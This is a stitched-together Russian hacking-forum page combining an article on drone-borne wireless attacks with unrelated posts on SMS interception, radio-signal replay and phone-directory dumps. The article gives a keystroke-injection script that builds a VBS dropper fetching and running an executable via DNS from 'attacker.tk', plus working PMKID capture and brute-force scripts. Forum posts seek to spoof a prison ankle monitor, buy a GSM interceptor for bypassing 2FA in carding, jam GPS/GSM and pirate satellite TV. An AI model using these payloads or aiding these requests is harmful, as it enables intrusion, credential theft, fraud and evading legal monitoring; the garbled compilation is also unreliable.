По иронии судьбы чаще всего беспроводные мышки и клавиатуры есть либо у IT- персонала, либо у руководителей. Так что добыча злоумышленника будет сразу весомая. Возможно, это окажется комп доменного администратора, в таком случае события уже во внутренней сети будут развиваться стремительно. А возможно, это будет какой‑то начальник, на рабочем столе которого много ценных файлов. Словом, какой бы компьютер это ни был, он, скорее всего, подключен к внутренней сети, а значит, злоумышленник почти наверняка достигнет главной цели — пробития периметра.

Чтобы пробить периметр описанным способом, с компьютера, подверженного этой атаке, должен быть выход в интернет до опорного сервера злоумышленника. Оттуда он скачивает и запускает бэкдор, на который потом поступают команды управления. Но далеко не в каждой внутренней сети разрешены прямые соединения на внешние IP-адреса. Однако популярные методы эксфильтрации, такие как DNS, вполне могут работать, и произвольные запросы, содержащие данные, могут выходить из сети наружу почти всегда. Это значит, что такой канал может быть использован как транспорт для скачивания бэкдора и его последующей работы.

Реализовать загрузку нужной хакеру программы по DNS можно и базовыми средствами любой ОС. Например, для Windows самым переносимым способом является VBS-скрипт, который написан на полноценном интерпретируемом языке программирования (смотри статью про методы инфильтрации и эксфильтации). Но размер вводимой в окно «Выполнить» команды ограничен, и для набора VBS- скрипта, загружающего средство удаленного управления через DNS, злоумышленнику потребуются минимум три команды:

mousejack/ducky-dnsexec.txt​

Code:Copy to clipboard

GUI r
DELAY 300
STRING cmd /C "(echo On Error Resume Next& echo Set objShell = CreateObject^("WScript.Shell"^)& echo Set writer = CreateObject^("Scripting.FileSystemObject"^).createtextfile^("out.exe"^))>1.vbs& ping x1.attacker.tk"
ENTER
GUI r
DELAY 300
STRING cmd /C "(echo For d = 1 To 927& echo pos = 0& echo While pos = 0& echo Set exec = objShell.Exec^("nslookup -type=txt d"^&d^&".txt.attacker.tk"^)& echo res = exec.Stdout.ReadAll^(^))>>1.vbs& ping x2.attacker.tk"
ENTER
GUI r
DELAY 300
STRING cmd /C "(echo pos = inStr^(1,res,"?"^)& echo txt = Mid^(res,pos+1,253^)& echo Wend& echo For b = 0 To Len^(txt^)/2-1& echo writer.Write Chr^(CInt^("^&H" ^& Mid^(txt,1+b*2,2^)^)^)& echo Next& echo Next)>>1.vbs& ping x3.attacker.tk"
ENTER
GUI r
DELAY 300
STRING cmd /C "wscript 1.vbs & out.exe"
ENTER

При выполнении команд на сервер злоумышленника должно прийти три DNS-отстука, означающих успешность набора команд.

Это отличный пример того, как ты или твоя компания могут быть легко взломаны, причем даже без дрона (об этом в одной из следующих статей). И чем больше компания, тем выше вероятность встретить подверженную уязвимостям беспроводную периферию. Мой опыт показывает: несмотря на то что эта уязвимость найдена еще в 2016 году, о ней до сих пор мало кто знает. А те, кто знает, сильно ее недооценивают. Тем не менее встречается она повсеместно. А аппаратная специфика этой уязвимости обеспечивает ей еще достаточно долгую жизнь, ведь компьютерные мышки мы не привыкли менять так же часто, как телефоны.

Атака EAP​

В статье про Pineapple уже рассматривались атаки на WPA Enterprise, но там описано возможное их применение в статичном режиме — с ожиданием попадания клиентов в радиус действия. С дроном хакер может провести такую атаку в ином ключе — динамично, самостоятельно обнаруживая и атакуя клиентские устройства.

Теперь он в состоянии облететь каждое здание, где размещаются цели атак. Так как отправка учетных данных WPA Enterprise не требует участия пользователя, она происходит достаточно быстро, что делает эту атаку возможной даже без остановки пролетающего мимо дрона.

На представленной ниже иллюстрации телефоны сотрудников бессознательно кинули в пролетающий мимо дрон учетные записи корпоративной беспроводной сети.

Для реализации такой атаки злоумышленнику не нужно дорабатывать скрипты Pineapple. Все необходимое уже проделано в соответствующем разделе предыдущей статьи. Для активации атаки на Pineapple просто ставится перемычка на GPIO-25 (замыкающая пины 20 и 22), после чего устройство включается. Загорелся зеленый светодиод — значит, точка доступа поднялась и атакующий может лететь. Дрон вместе с устройством прилетает обратно, горит красный или желтый светодиод — значит, мы вернулись не с пустыми руками и пароль или хеш чьей‑то доменной учетки сохранен на карте памяти. С этой доменной учеткой злоумышленник впоследствии может получить удаленный доступ к почте и раскрыть конфиденциальные данные или даже, при наличии у компании VPN, получить доступ в ее локальную сеть.

Захват хендшейка WPA и PMKID​

В предыдущей статье про Pineapple рассмотрен ряд атак на аутентификацию Wi-Fi. Аутентификация (захват PMKID) и деаутентификация (захват WPA Handshake) происходят достаточно быстро. Более того, если захват WPA Handshake требует определенных обстоятельств (наличия клиентов), то захватить PMKID, если имеется уязвимая точка доступа, можно всегда и достаточно быстро.

PMKID — это еще один пригодный для брутфорса хеш, который можно получить из первой части четырехступенчатого рукопожатия (EAPOL M1). Для этого не нужны аутентифицированные клиенты, такой пакет точка доступа может отправить атакующему сама в ответ на запрос ассоциации:

wpapsk/auth.sh​

Bash:Copy to clipboard

#!/bin/bash
dumpfile="pmkid-$(date +'%H:%M:%S_%d.%m.%Y')"
hcxdumptool -i mon0 --enable_status=7 -o $dumpfile.pcapng --disable_client_attacks --disable_deauthentication $* | while read line
do
    if echo "$line" | grep -q 'PMKIDROGUE:'; then
        led yellow on 2> /dev/null
    fi
done
tcpdump -r $dumpfile.pcapng -nn -w $dumpfile.pcap
rm -f $dumpfile.pcapng

Пока дрон летит, этот скрипт отправляет запрос ассоциации на каждую точку доступа в пределах досягаемости радиосигнала.

Как только PMKID захвачен, загорается желтый светодиод. И WPA handshake, и PMKID дает хеш‑сумму, по которой можно восстановить пароль к точке доступа методом перебора по словарю:

wpapsk/brute-pmkid.sh​

Bash:Copy to clipboard

#!/bin/bash
while sleep 60
  for pcap in *.cap
  do echo "$pcap"
    hcxpcapngtool "$pcap" --pmkid=/tmp/m1.pmkid
    hcxhash2cap --pmkid=/tmp/m1.pmkid -c /tmp/out-pmkid.pcap
    for bssid in $(echo 0 | aircrack-ng "/tmp/out-pmkid.pcap" | grep 'with PMKID' | awk '{print $2}')
    do
      if [ -f "/tmp/$bssid" ]; then
        continue
      fi
      touch "/tmp/$bssid"
      aircrack-ng -w /home/pi/wpapsk/passwords_top1k.txt -b "$bssid" "/tmp/out-pmkid.pcap" -l "$bssid.txt"
      if [ -s "$bssid.txt" ]; then
        led red on 2> /dev/null
        exit
      fi
    done
    rm -f /tmp/m1.pmkid
    rm -f /tmp/out-pmkid.pcap
  done
done

Pineapple с таким скриптом в состоянии сам определить слабые пароли к точкам доступа. Для этого сначала удаляются все пакеты EAPOL M2 (handshake), так как проверяются только с PMKID. После их уникализации, чтобы не брутить одни и те же хеши многократно, запускается уже брутфорс прямо в воздухе. Если пароль подобран, загорается красный светодиод.

Скрипт служит хорошим примером манипуляции набранными хешами, ведь в таком случае aircrack-ng при наличии handshake игнорирует PMKID. Вообще, брутить хеши целесообразно на более мощном оборудовании, ведь все собранные в полете хеши сохраняются на карте памяти Pineapple.

Разведка беспроводных сетей​

Применительно к атакам на беспроводные сети дрон весьма неплохо подходит на роль разведчика. Разместив все тот же Pineapple и подключив к нему внешний GPS-донгл, атакующий может триангулировать расположение каждого беспроводного устройства (точек доступа Wi-Fi, клиентов, Bluetooth-устройств и даже беспроводных мышек и клавиатур) и фиксировать их расположение на карте. Эта информация может быть очень актуальна как для атакующего, выявляющего поверхность будущих атак, так и для защитников, контролирующих свои ресурсы. Ведь весь необходимый сбор данных и расчеты полностью производит программа Kismet. На выходе — дамп SQLite, удобный для самостоятельного парсинга.

Для географической разведки беспроводных сетей требуется лишь два компонента, которые на Pineapple запускаются при старте в положении перемычки на 27-м GPIO:

startup.sh​

Bash:Copy to clipboard

...
elif jmp 27; then
  echo "[*] wi-fi recon (dynamic)"
  monitor_enable
  cd recon
  screen -dmS recon -t gpsd -L -Logfile "$time-recon-%n.log" './gps.sh'
  screen -r recon -t kismet -X screen './kismet.sh'
  screen -r recon -t tcpdump -X screen './tcpdump.sh'
  cd -
...

Когда устанавливается соединение со спутниками, зеленый светодиод дает понять, что можно лететь:

recon/gps.sh​

Bash:Copy to clipboard

#!/bin/bash
gpsd -N /dev/ttyACM0 -D 5 | while read line
do echo "$line"
    if echo "$line" | fgrep -q 'GPS:'; then
        led green on 2> /dev/null
    fi
done

Успешный запуск Kismet, в свою очередь, зажигает желтый светодиод:

recon/kismet.sh​

Bash:Copy to clipboard

#!/bin/bash
kismet -c mon0 | while read line
do echo "$line"
    if echo "$line" | fgrep -q 'success'; then
        led yellow on 2> /dev/null
    fi
done

Теперь после облета территории или даже загрузки GPS-маршрута в дрон атакующий либо защитник могут в автоматическом режиме более качественно выполнить анализ беспроводных сетей, покрывая максимум территории. Полученный дамп может быть преобразован в веб‑страницу, содержащую удобную интерактивную карту, на которой наложено рассчитанное местоположение источников сигнала, а также построена тепловая карта сигналов, как на следующем рисунке.

Тепловая карта показывает уровень сигнала от беспроводных устройств в каждой исследованной точке. Любая точка доступа или клиент на такой карте по клику мышкой обводится окружностью, показывающей область ее слышимости.

При этом тепловая карта, как можно заметить, перестраивает свой цвет под каждое выбранное беспроводное устройство, тем самым показывая, в каких местах и как принимался сигнал от него. Каждая область, где пролетал дрон, при выборе мышкой показывает беспроводные устройства, доступные именно там.

Все вместе это дает представление, не выходит ли зона приема за контролируемую область, где может находиться злоумышленник.

Постэксплуатация​

Если атака будет успешной, злоумышленнику, вероятно, придется вернуться и воспользоваться обнаруженной уязвимостью. Ведь подобранный пароль или перехваченные учетные данные сработают только для конкретной беспроводной сети. В таком случае дрон может доставить Pineapple, снабженный 4G-модулем для удаленного подключения к беспроводной сети на охраняемой территории.

То, как использовать Pineapple в качестве средства удаленного доступа, продемонстрировано в предыдущей статье.

Дрон с Pineapple на борту может приземлиться на крышу здания. С выключенными пропеллерами он в состоянии ожидать достаточно долго. А тем временем злоумышленник может удаленно подключиться к скомпрометированной беспроводной сети и развивать дальнейшие атаки уже по внутренним сетям. И вполне вероятно, что внутренняя сеть в результате такого проникновения падет раньше, чем на крышу поднимутся сотрудники службы безопасности. Впрочем, в таком случае дрон может стремительно улететь, унеся на своем борту и Pineapple, и 4G-модем. Так что не останется никаких следов.

Автор @s0i37
Lead cybersecurity analyst at USSC t.me/s0i37_channel
источник xakep.ru

Здравствуйте уважаемые форумчане, я нубик, извиняюсь, если не в тему, но нужно подменить сигнал от браслета фсин к станции. через сдр радио можно сделать так чтоб без палева? на какой частоте передается сигнал?

Вынесу обсуждение технических вопросов из коммерческой темы

StateProperty said:

**Вашему вниманию представляется по настоящему уникальное предложение, а именно возможность купить настоящий GSM Intercepter, то о чем мечтал каждый кардер с момента массового ввода 2FA в виде смс.

Краткие технические характеристики и ответы на наиболее популярные вопросы:**
.................
Q: В каких странах работает?
A: Во всех странах где существует связь 2G формата 900\1800mhz. В исходном виде комплекс работает в странах СНГ и части европейских стран, в остальных случаях требуются незначительные доработки на локальные частоты 3G\4G.
................

Click to expand...

Если возможно - интересно было бы уточнить пару моментов:
- обычно, при работе с комплексами нужно выполнять предварительное сканирование сети, чтобы определить правильные частоты для редиректора и номер канала ARFCN для 2G базы. Китайцы для скана 2g используют перепрошитую нокию, как у них обстоит вопрос с 4g вообще не понятно. Автоматизирован ли у Вас этот процесс? т.е. сколько грубо говоря времени занимает весь процесс от включения

• до захвата СМС

- комплекс - "онлайновый" ? TAN / 2fA от 3dSecure, не истечет пока он Kc будет ломать?

- дешифратор - он будет в составе комплекса, или требует онлайн-подключения к неким серверам?

Мечтаете открыть соседский гараж? Или перехватить gsm трафик?
Или словить сигнал со спутника?
Не проблема! Ведь сегодня у нас на обзоре Hackrf one - железка для для работы с радиосигналами!
У нас версия Portapack h2 , заказанная с алика.
Сегодня мы рассмотрим две главные функции девайса: перехват (сохранение) сигнала и его емуляция.

Внешний вид девайса​

В комплекте с portapack была антенна и кабель microusb. «хрен вам а не инструкция в комплекте » сказали нам китайцы)
У девайса железный корпус , сенсорный екран (китайцы наебали на качество, сенсор очень плохо работает.)Крестовина посередине , для управлениям прошивкой , кнопка dfu и reset , три разных выхода под антенны (главный выход вверху , туда закручиваем антенну), вход под sd карту (обязательно вставить туда карту перед сохранением сигнала) и порт micro usb для подачи питалова и саязи с пк.

Обзор прошивки​

Внимание!
Перед включением девайса , обязательно прикрутите антенну , иначе есть риск спалить плату!
Сперва прикрутите антенну , потом уже подавайте питалово!
На нашем девайсе версия прошивки Portapak|HAVOC local - 79baef7 , стабильная и удобная прошивка.

В главном меню мы видим пункты:
Play dead
Receivers
Transmit
Capture
Replay
Calls
Scanner
Utilities
Settings
Hackrf mode

Сегодня мы будем юзать пункты:

Calls - для определения частоты сигнала
Capture - для перехвата (сохранения сигнала)
Replay - для емуляции (повтора) сохраненного сигнала
(Hackrf mode для подключения к пк)

(На гитхабе вы сможете найти много кастомных прошивок.)

Подключение к пк​

При первом подключении ничего не случиться , чтобы девайс отобразился на пк нужно установить драйвер.
Для установки драйвера:
1.Подключаем девайс к пк
2.На portapack выбираем Hackrf mode
3.Скачиваем Zadig
4.Запускаем программу и ставим все драйвера.

Перехват и емуляция сигнала с помощью Universal Radio Hacker ​

URH (Universal Radio Hacker) - программа для работы с хакрф через пк. Ее плюс в том что здесь удобный интерфейс, три главных инструмента , работают очень понятно. Плюс инструмент для анализа сохраненого сигнала.

Скачать: Universal Radio Hacker

Запускаем программу
(сорян за качество)

Здесь мы видим главное меню , нажимаем на меню , видим три главных пункта :

Spectrum analysis - пункт для определения частоты сигнала.

Record signal - запись (перехват) сигнала.

Open file - емуляция сохраненного сигнала (после сохранения сигнал сохраняется в файл , в пункте Open file , мы вибираем наш файл в который сохранили сигнал , и еммулируем)

Начнем! будем перехватывать сигнал от пульта.

Подключаем девайс к пк и вводим его в режим hackrf mode

1.Выбираем в главном меню Spectrum analysis для определения частоты сигнала пульта

здесь выбираем HackRF

и нажимаем

пульт у нас работает на семействе частот 433mHz , в Frequency выбираем 433.0M
Sample rate и Bandwidth делаем по 20.
Нажимаем Start

Как видим у нас началось сканирование входящих сигналов

теперь нажмем кнопку на пульте , видим что на графе отобразился сигнал , наводим на полоску и кликаем.

2. Выбираем в главном меню Record signal для записи сигнала

нажимаем start и снова нажимаем кнопку на пульте , как видим сигнал записался , жмем stop и save (сохраняем сигнал в файл)

3.Емулируем сохраненный сигнал. Пункт open file

вот наш сохраненный сигнал , теперь нажимаем на play. Готово мы перехватили и емулировали сигнал!

Перехват и емуляция сигнала с помощью Portapack​

1. Определяем частоту сигнала:
В меню переходим в calls

в значении min выставляем минимальное значение сигнала а в max максимальное
при нажатие на кнопку пульта мы увидим частоту сигнала.

2. Запись сигнала:
вставляем sd карту
в меню переходим в capture

выбираем частоту и для записи нажимаем красную. кнопку R.
после записи сигнал сохраниться на sd карту.

3. Емуляция сигнала:
в меню переходим в replay.
нажимаем open file , открываем файл и нажимаем play

Готово! в итоге мы перехватили сигнал от ворот , девайс умеет очень многое. Спасибо за внимание! (статья написана на коленке не судите строго)

Требуется спроектировать и собрать типовой образец элемента. Элемент этот входит в радиоцепь равных ему элементов и является модемом (приемо- передатчиком). Автономность элемента не менее 3 лет. Блоком питания выступает аккумулятор, размер ограничен условно размером одного кирпича. Но чем меньше, тем лучше. Предположительная частота вещания 433 Мгц. Частота общения между элементами — один раз в минуту.

Принцип работы — получение сигнала от другого элемента, присоединенного к каждому модему. Другой элемент этот по условию нашей задачи энергию не отсасывает.

Задача, чтобы элементы в цепи могли устойчиво общаться, имея 1000 элементов в цепи. можете писать на почту untno собака ya.ru

MegaContacts 2007

Универсальный телефонный справочник для Windows 2000/XP/Vista

-определение ФИО абонента по номеру телефона
-поиск телефонов по ФИО абонента или адресу
-просмотр журнала вызовов с определением абонентов по номеру
-копирование найденных данных в Контакты
-просто осуществлять Поиск по номерам, фамилиям и адресу

=======================
Беларусь
Минск (26.06.2007)
Брестская область
Брест
Барановичи
Дрогичин (27.06.2007)
Пинск
Столин
Витебская область
Витебск (12.08.2007)
Верхнедвинск (23.01.2007)
Докшицы
Глубокое
Новополоцк (24.01.2007)
Полоцк (24.01.2007)
Гомельская область
Гомель (08.01.2007)
Жлобин
Мозырь
Речица (10.01.2007)
Светлогорск
Гродненская область
Гродно
Лида
Волковыск
Сморгонь (10.01.2007) thx to eric_s
Щучин (23.06.2007)
Минская область
Борисов (24.01.2007)
Вилейка (23.01.2007) thx to eric_s
Воложин (23.01.2007) thx to eric_s
Жодино
Молодечно (04.11.2006)
Слуцк (25.02.2007)
Солигорск (26.06.2007)
Столбцы (10.01.2007)
Заславль
Мачулищи
Могилёвская область
Вся область (08.01.2007)
Один известный мобильный оператор

Россия
Москва
Санкт-Петербург

Владимир
Волгоград (12.03.2007)
Волжский (12.03.2007)
Воронеж
Екатеринбург (11.04.2007)
Иваново
Иркутская область (31.05.2007)
Казань (10.04.2007)
Калуга
Кемерово
Ленинск-Кузнецкий
Коми
Печора (28.06.2007)
Кострома
Краснодар (01.06.2007) thx to андрей п.
Красноярск (04.07.2007)
Нижний Новгород (19.08.2007)
Норильск
Новосибирск
Омск (06.08.2007)
Орёл
Ливны (06.04.2007)
Петрозаводск (10.01.2007)
Псков (28.07.2007)
Ростов-на-Дону (08.02.2007)
Рязань (19.04.2007)
Самара
Смоленская область
Ставрополь
Тульская область (18.08.2007)
Тюмень
Хабаровск (вкл. Николаевск-на-Амуре)
Чебоксары
Челябинск (16.03.2007)
Череповец (31.05.2007)
Ярославль

Украина
Киев (26.01.2007) на русском и на украинском языках
Справочники идентичны, за исключением языка названий улиц и населённых пунктов.
Киевская область (07.02.2007)
Днепропетровск (06.04.2007)
Кривой Рог (17.03.2007)

Никополь
Донецк
Житомир (28.07.2007)
Запорожье (06.04.2007)
Ивано-Франковск (01.06.2007)
Кировоградская область
Крым

Луганск (30.05.2007)
Львов
Одесса (13.04.2007)
Полтава (04.08.2007) на русском и на украинском языках
Справочники идентичны, за исключением языка названий улиц и населённых пунктов.
Ровно (10.04.2007)
Тернопольская область (15.03.2007)
Черкасская область (15.08.2007)
Черниговская область (16.05.2007)
Харьков

Херсон (31.01.2007) на русском и на украинском языках
Справочники идентичны, за исключением языка названий улиц и населённых пунктов.

Латвия
Латвия (07.02.2007)
Молдова
Приднестровье
Казахстан
Астана (03.05.2007)

Click to expand...

Часть 1 - ~300 mb
Часть 2 - ~100 mb

Взято с xakepy.ru

Компилируем собственное ядро Samsung на Android
Многие специалисты по безопасности и системные администраторы знакомы с процессом, который компилирует ядро Linux, а затем устанавливает его на наш любимый дистрибутив. Это может быть сделано для разных целей: усиление безопасности, настройка функций и многое другое...

Тем не менее, когда речь идет о ядрах Android (которые в обычно основаны на ядре Linux), особенно для моделей, которые не принадлежат Google, вы начинаете понимать, что не все так просто, и это нельзя так просто сделать, даже следуя интерактивному пошаговому руководству.

Сегодня и в моей следующей серии Medium я постараюсь сделать все возможное, чтобы изменить мнение людей. Сегодня я расскажу о такой штуке, как Infosec, и сделаю ее доступной для всех, кто заинтересован в этом.

Небольшой отказ от ответственности : это руководство относится к Samsung S7 (SM-G930F), однако его можно применять к другим моделям Samsung без каких-либо изменений.

Подготовка окружающей среды
Скачайте Ubuntu x64.iso. Я особенно люблю Xubuntu, так как я предпочитаю красивый внешний вид, однако любая другая система тоже допустима. На данный момент Xubuntu 18.04 (Bionic Beaver) является последней версией, которую вы можете скачать по этой ссылке .

Создайте виртуальную машину Xubuntu 18, используя предпочитаемый вами гипервизор. Убедитесь, что он имеет по крайней мере:

● 4 ГБ ОЗУ
● 40 ГБ дискового пространства
● 2 ядра процессора

Это ускорит процесс компиляции ядра и гарантирует, что у васне кончится место на диске при компиляции ядра.

Как только ваша виртуальная машина будет запущена, войдите как root и выполните:

Code:Copy to clipboard

apt-get -y update
apt-get -y upgrade
apt-get -y dist-upgrade
apt-get -y install git ccache automake lzop bison gperf build-essential zip curl zlib1g-dev zlib1g-dev:i386 g++-multilib python-networkx libxml2-utils bzip2 libbz2-dev libbz2-1.0 libghc-bzlib-dev squashfs-tools pngcrush schedtool dpkg-dev liblz4-tool make optipng heimdall-flash adb

Теперь нам нужно загрузить исходный код Kernel и кросс-компилятор Android, что позволит нам создавать код AARCH64 из обычной виртуальной машины x86.

Перейдите в папку, в которую вы хотите загрузить исходный код, и выполните:

git clone [URL]https://github.com/djb77/samsung-kernel.git[/URL] — branch G93XX-ALL

Убедитесь, что репозиторий относится к телефону, который вы хотите прошить.

Затем, в той же папке, в которой находится папка с исходным кодом, выполните:

git clone[URL='https://android.googlesource.com/platform/prebuilts/gcc/linux-x86/aarch64/aarch64-linux- android-4.9'] https://android.googlesource.com/platform/prebuilts/gcc/linux-x86/aarch64/aarch64-linux- android-4.9[/URL]

На данный момент у нас должно быть все необходимое для компиляции ядра.

Сборка ядра
Во-первых, нам нужно установить несколько переменных среды. Перейдите в папку, содержащую кросс-компилятор Android , предположительно, он называется aarch64-linux-android-4.9, и выполните следующее:

Code:Copy to clipboard

export CROSS_COMPILE=$(pwd)/bin/aarch64-linux-android-
export ARCH=arm64
export SUBARCH=arm64
export ANDROID_MAJOR_VERSION=o

Несколько важных предостережений относительно этих переменных сред:

● В редком случае, когда архитектура вашего устройства не arm64, измените переменные «ARCH» и «SUBARCH» соответственно. Вы можете увидеть список опций в папке «arch» в исходном коде ядра.

● Убедитесь, что папка, на которую указывает переменная «CROSS_COMPILE» (после добавления версии), действительно существует. В противном случае процесс не удастся.

● Переменная «ANDROID_MAJOR_VERSION» установлена в «o», потому что мы компилируем Android Oreo (8.x). Это изменится со временем, поэтому убедитесь, что он настроен соответствующим образом.

Затем нам нужно выбрать нашу целевую конфигурацию: перечислите содержимое папки « **arch / / configs **» и выберите ту, которая соответствует вашему устройству. В моем случае это «exynos8890-herolte_defconfig», я использую arm64 в качестве целевой архитектуры, вот мой вывод:

Варианты конфигурации

После того, как вы выбрали целевую конфигурацию, проверьте, сколько ядер у вашего телефона (см. Документацию устройства), а затем выполните следующее:

Code:Copy to clipboard

make clean
make mrproper
make exynos8890-herolte_defconfig
make -j(number of cores)

Не забудьте заменить « exynos8890-herolte_defconfig » на ваш файл defconfig (defconfig file).

Процесс не должен занимать много времени (от 5 до 10 минут), и после компиляции ваше ядро должно находиться в папке arch / / boot с именами Image иImage.gz
.

Это было не слишком сложно, верно? : D

Специально для xss.is
Переводчик статьи - https://xss.is/members/177895/
Источник: <https://medium.com/@alex91ar/debugging-the-samsung-android- kernel-part-1-ab2a9b87c162>

Протокол, специально разработанный для защиты данных владельцев смартфонов, уязвим к атакам с использованием поддельных базовых станций. Проблема затрагивает сети от 3G до 5G, а для осуществления атаки необходим лишь ноутбук и оборудование стоимостью порядка 1,1 тыс. евро.

Речь идет о протоколе Authentication and Key Agreement (AKA), предназначенном для обеспечения безопасности передачи данных между мобильным устройством и базовой станцией. В опубликованном Ассоциацией криптологических исследований докладе представлена новая атака на протокол AKA, в том числе 5G AKA, которая «нарушает приватность абонента в еще большей мере, чем известные атаки для отслеживания местоположения».

Атака представляет большую угрозу, поскольку эксплуатирует логическую уязвимость в протоколе, а значит, затрагивает AKA в целом, а не только какую- то определенную его реализацию.

Как пояснили исследователи, AKA представляет собой протокол «запрос-ответ», полагающийся на симметричное шифрование и последовательность чисел (SQN) для проверки актуальности запросов в целях предотвращения атак повторного воспроизведения. В связи с обнаруженными ранее уязвимостями консорциум 3GPP улучшил AKA для 5G. В протокол было добавлено рандомизированное ассиметричное шифрование с целью обеспечения безопасности идентификатора пользователя (идентификатор отправляется во время рукопожатия, осуществляемого перед шифрованием).

Тем не менее, в обновленном протоколе по-прежнему используются числа SQN, и именно их исследователи использовали для атаки. Недостаточная рандомизация и использование XOR позволили им обойти механизм защиты SQN и следить за пользователем (узнавать количество осуществляемых звонков и отправленных SMS, отслеживать местоположение).

По словам исследователей, представленная ими атака серьезнее предыдущих, поскольку другие атаки с использованием поддельных базовых станций эффективны только в случае, если жертва находится в пределах действия поддельной базовой станции.

Для осуществления атаки специалисты использовали ноутбук, универсальный программный радиоприемник, считыватель смарт-карт и программное обеспечение OpenLTE. За исключением ноутбука, стоимость необходимого оборудования составила 1140 евро (вместо ноутбука можно использовать Raspberry Pi).

3GPP – консорциум, разрабатывающий спецификации для мобильной телефонии. 3GPP был создан в 1998 году. Основным направлением работы является разработка технических спецификаций и технических отчетов в области сетевых технологий и радиодоступа в мобильных системах.

Ссылка на доклад:
https://eprint.iacr.org/2018/1175

Для тех, кто хочет с пользой для себя провести новогодние праздники, прикладываю все необходимые компоненты для самостоятельной реализации написанного выше.

1. Инструкция для OpenLTE:
[https://cn0xroot.com/2016/07/06/how...station-with-gnuradio-bladerf-openlte- part-1/](https://cn0xroot.com/2016/07/06/how-to-build-4g-lte-base-station- with-gnuradio-bladerf-openlte-part-1/)

2. Ноутбук
Asus x751 семейства. BladeRf имеет частые конфликты с ЦПУ и даже сама фирма Nuand не всегда знает причину конфликта.

3. Программно управляемое радио bladeRf x40
https://www.nuand.com/product/bladerf-x40/

4. Антенны(2)
https://www.nuand.com/product/tri-band-antenna/

5. Софт OpenLte:
http://openlte.sourceforge.net

Это базовый набор, однако наилучшие результаты можете достигнуть используя два SDR одновременно.

Ученые из Швейцарской высшей технической школы Цюриха разработали атаку, которая позволяет не водить PIN-код во время совершения бесконтактных платежей по картам Visa Credit, Visa Electron и VPay. Данная атака позволяет злоумышленнику, который владеет данными украденной бесконтактной карты Visa, использовать карту для оплаты дорогостоящих товаров, чья цена намного превышает лимит бесконтактных транзакций. И PIN-код при этом не понадобится.

Доклад, описывающий эту технику атак, уже опубликован в открытом доступе, а полноценную презентацию своих изысканий специалисты намерены устроить на симпозиуме IEEE, который пройдет в мае 2021 года.

Ученые рассказывают, что придуманную ими атаку очень трудно обнаружить, ведь злоумышленник будет похож на обычного клиента, который расплачивается на покупку с помощью смартфона. На самом же деле атакующий будет расплачиваться украденной бесконтактной картой Visa, которая спрятана где-то на него теле.

Для этой атаки не нужно сложное оборудование, понадобятся лишь два смартфона на Android, специальное приложение, созданное исследовательской группой, а также сама бесконтактная карта. При этом приложение, установленное на обоих смартфонах, будет работать в качестве эмулятора PoS-терминала и эмулятора самой карты.
В итоге атака выглядит следующим образом: смартфон, который имитирует PoS- устройство, помещают рядом с украденной картой, а смартфон, работающий в качестве эмулятора карты, используют для оплаты товаров. Идея заключается в том, что эмулятор PoS просит карту произвести платеж и модифицирует детали транзакции, а затем передает измененные данные через Wi-Fi на второй смартфон, который в итоге совершает крупный платеж без необходимости ввода PIN-кода (ведь злоумышленник изменил данные транзакции таким образом, чтобы ввод PIN- кода не требовался). Демонстрацию атаки можно увидеть ниже.

«Наше приложение не требует root-прав или каких-либо хитроумных хаков Android. Мы успешно протестировали его на обычных устройствах Pixel и Huawei», — пишут исследователи.

Click to expand...

Доклад

https://arxiv.org/pdf/2006.08249.pdf

Возник вопрос по осмоBB. у кого есть рабочий осмоком? Можно ли провести разведку подключённых устройств, узнать МАК адрес оборудования, как действует система? можно ли применить Мальтего для разведки, или подобное..

Вот задумался, а есть в природе софт на мобилку, который при получении определенной смс грохает содержимое девайса? Естественно девайс должен быть рутанутый.
Схема развития событий

1. договариваюсь с товарищем, каждый час пингуемся в жабе
2. иду гулять
3. бац "теряю" телефон
4. меня нет на связи 1 час, товарищ отсылает смс
5. профит, телефон чист

Переходим easysms.gr регаемся через gmail или Facebook тыц

расскажу одну фичу как можно обмануть такие сервисы esendex.com сервис что в топе да и любой дрогой не пропускает эти номера 88005555550 и 9000 но если ноль заменить на английскую большую букву о пролетает сука 8800555555O и 9OOO кли- кай

Видео это заметно как в сервисе светиться буква но на трубу приходит нормально проверил сам :hi:

День добрый, уважаемые пользователи.
Сразу оговорюсь, что в теме не очень разбираюсь.
Короче, в связи с легким дауншифтингом в виде тяги к природе и покупки загородного дома в глуши впервые повстречался с темой спутникового телевидения.
Купил многострадальный триколор. Не буду даже говорить о глюках, зависаниях, замене декодера, так теперь ещё и за 2 месяца до конца оплаты - отрубили с непонятной ошибкой.
В связи с этим хочу спросить - какие есть методы получить картинку с множеством каналов бесплатно?
Погуглил немного, увидел пиратские карты, кардшаринг, прошивку декодеров, но нигде никакой конкретики. А я, видимо, плохо ищу.
Короче, если кто в теме - расскажите, какие методы есть, как получить, может ресурсы или контакты умельцев.
Благодарю.

нужен приемник передатчик типа hack RF, чтобы можно было забивать эфир (WIFI GPS GSM) если такое возможно
может кто ссылочку даст или инфой поделиться буду благодарен

Есть у нас тут специалисты фрикеры? Контакт можно в пм. Но только чтоб реальный. Тема соответственно тоже реальная.

Собственно у кого есть сей сабж. Очень интересует.

Автор: Andrey Nikishaev

В этой статье будет приведено пошаговое руководство взлома фитнес-трекера с поддержкой Bluetooth и низким энергопотреблением средствами ОС Linux.

Эта история началась с моего поста в Facebook, посвященного проблеме отсутствия API для фитнес-трекеров, и почему сей факт мешает исследователям данных создавать что-то полезное и крутое для этих девайсов.

Тот пост спровоцировал жаркую дискуссию и привлек внимание моего друга Володимира Шиманского, пытавшегося помочь мне с кодом Лео Соаресадля моего фитнес- трекера MiBand 2. Володимир пытался запустить этот код, но были проблемы с соединением. Проблема была решена в течение нескольких часов, и код обновлен.

Эта ситуация подтолкнула меня к активным действия. Используя вышеуказанный код, я смог подключиться к MiBand 2, поработать с уведомлениями и измерить ритм сердца. Однако этот функционал меня не устраивал. Я хотел получать данные с сенсоров в режиме реального времени и поэкспериментировать с полученной информацией. Мне хотелось создать советника по физическим упражнениям. В итоге было решено хакнуть фитнес-трекер. Приступаем.

У меня не было никакого опыта работы с BLE-девайсами (Bluetooth Low Energy), и я решил начать с изучения этой технологии. Выяснилось, что никаких особых сложностей нет:

• У каждого BLE-устройства есть несколько служб.
• У каждой службы есть некоторые характеристики.
• У некоторых характеристик есть дескрипторы (если у характеристики больше чем один параметр или тип соответствует чтению или уведомлению).
• У некоторых характеристик есть доступ только на чтение/запись (например, текущее время, статус батареи или информация о последней ревизии).
• Некоторые характеристики более сложны и работают, используя запросы/цикл уведомлений (например, монитор частоты сердцебиения в режиме реального времени или авторизация).

